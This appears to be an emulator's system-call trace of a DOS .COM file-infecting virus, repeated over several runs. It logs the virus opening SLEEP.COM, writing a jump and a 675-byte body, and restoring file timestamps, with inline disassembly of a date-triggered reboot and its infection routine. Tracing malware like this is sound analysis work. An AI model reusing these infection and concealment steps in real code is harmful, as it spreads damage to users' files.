2018-12-25T11:59:43.233867403Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.244558214Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.247582399Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.254408786Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.261767946Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.264167304Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.268794898Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.278458795Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.281802385Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.284254937Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.287272593Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.301434138Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.302928798Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.30464841Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.309393333Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.319089177Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.325514623Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.332272959Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.334401928Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.34405619Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.351800337Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.354469036Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.355793657Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.358840924Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.378914142Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.38031767Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.388593604Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.398642812Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.401170996Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.407976381Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.414504067Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.416239145Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.42617666Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.432731333Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.435439736Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.437538033Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.440343529Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.448614212Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.450947384Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.458847263Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.4688218Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.472639433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.480186872Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.486530425Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.489495697Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.492110373Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.496342218Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:43.499078883Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.500334925Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.502254482Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.913599955Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.915198313Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.916227646Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.917242866Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.920522468Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.926219487Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.937344209Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.944204283Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.950618713Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.952412942Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.967588428Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.974645512Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.977595798Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.979407798Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:42.982164188Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.990862271Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.992510385Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.000751254Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.012996882Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.015683124Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.022632998Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.028740986Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.030447676Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.040996321Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.047775006Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.050379809Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.05206436Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.054501924Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.062915946Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.064906461Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.072930178Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.084357296Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.087691941Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.094172755Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.100533637Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.103105493Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.113318081Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.119711295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.122689925Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.124050038Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.126429431Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.135168619Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.137187344Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.144652751Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.154173829Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.157354707Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.163613859Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.16982596Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.173060815Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.182795981Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.194474208Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.201431794Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.202969401Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.205400531Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.214020568Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.216056466Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.223540316Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.23401803Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.236696433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.243266625Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.250586283Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.252557091Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.256979372Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.262806623Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.265550111Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.26690879Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.270180462Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.284175007Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.285647642Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.288127252Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.29315002Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.296044546Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.303630665Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.309124407Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.310439732Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.319862708Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.327017788Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.329777257Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.332092632Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.334576796Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.343403146Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.347472079Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.354829753Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.360915594Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.363686055Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.370113109Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.37626122Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.378509188Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.388722519Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.395739014Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.399328528Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.400685974Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.403329563Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.413053367Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.414536371Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.421960006Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.431738054Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.43438803Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.440807463Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.447198801Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.449149154Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.45150553Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.455699032Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:43.458330546Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.460120638Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.461992651Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.041190168Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.042290947Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.044715298Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.046160523Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.049194267Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.056389467Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.062838115Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.070086129Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.078042019Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.080058108Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.100111023Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.107338889Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.114801903Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.116172213Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.118784507Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.128946166Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.130655185Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.139354864Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.151182374Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.154184097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.162210409Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.170114084Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.172719252Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.183734256Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.191146243Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.194331494Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.195648308Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.198189238Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.208469964Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.210174559Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.218527681Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.230239915Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.233137327Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.240261263Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.247750664Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.249797914Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.261318066Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.269373933Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.272572062Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.274493884Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.278163449Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.288085038Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.290281645Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.299691255Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.312004445Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.31513382Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.32298471Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.331745967Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.334267225Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.346869945Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.356082847Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.359116742Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.360594632Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.363851075Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.373300142Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.374978982Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.384255181Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.395079613Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.398075014Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.405903012Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.413736664Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.417111832Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.423124377Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.429088287Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.432468869Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.434593381Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.438569871Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.45496888Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.456694755Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.459690888Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.464533404Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.467359816Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.475006747Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.482399719Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.484331351Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.49574175Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.507308581Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.510293697Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.512362811Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.515080943Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.525226809Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.527938488Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.537491555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.54960943Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.553773316Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.562257056Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.56933969Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.571721699Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.59387943Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.601034403Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.604079097Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.606248771Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.608967254Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.618531567Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.621073228Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.629310702Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.639999299Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.643895385Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.651236767Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.658327236Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.661192136Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.66412178Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.66883332Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:43.671975013Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.673430832Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.675623622Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.431751452Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.433879824Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.435280753Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.436733624Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.440086313Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.446846827Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.451461752Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.455795007Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.462799269Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.465344268Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.484764546Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.49832081Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.505802476Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.507645963Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.513535224Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.524256553Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.526039879Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.536435774Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.547791518Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.551234981Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.559969537Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.568307721Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.570417511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.581419942Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.589184562Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.592464703Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.59435435Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.598659309Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.607846086Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.60986112Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.620407454Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.631820745Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.634831605Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.64272845Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.650438832Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.652398751Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.663787512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.671140868Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.674216037Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.676083458Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.679085287Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.688663639Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.690657707Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.700038345Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.710815547Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.713766301Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.721381471Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.728219619Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.730321221Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.742073666Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.749768576Z 64 PC: 12c10 | Write file or device (See above)
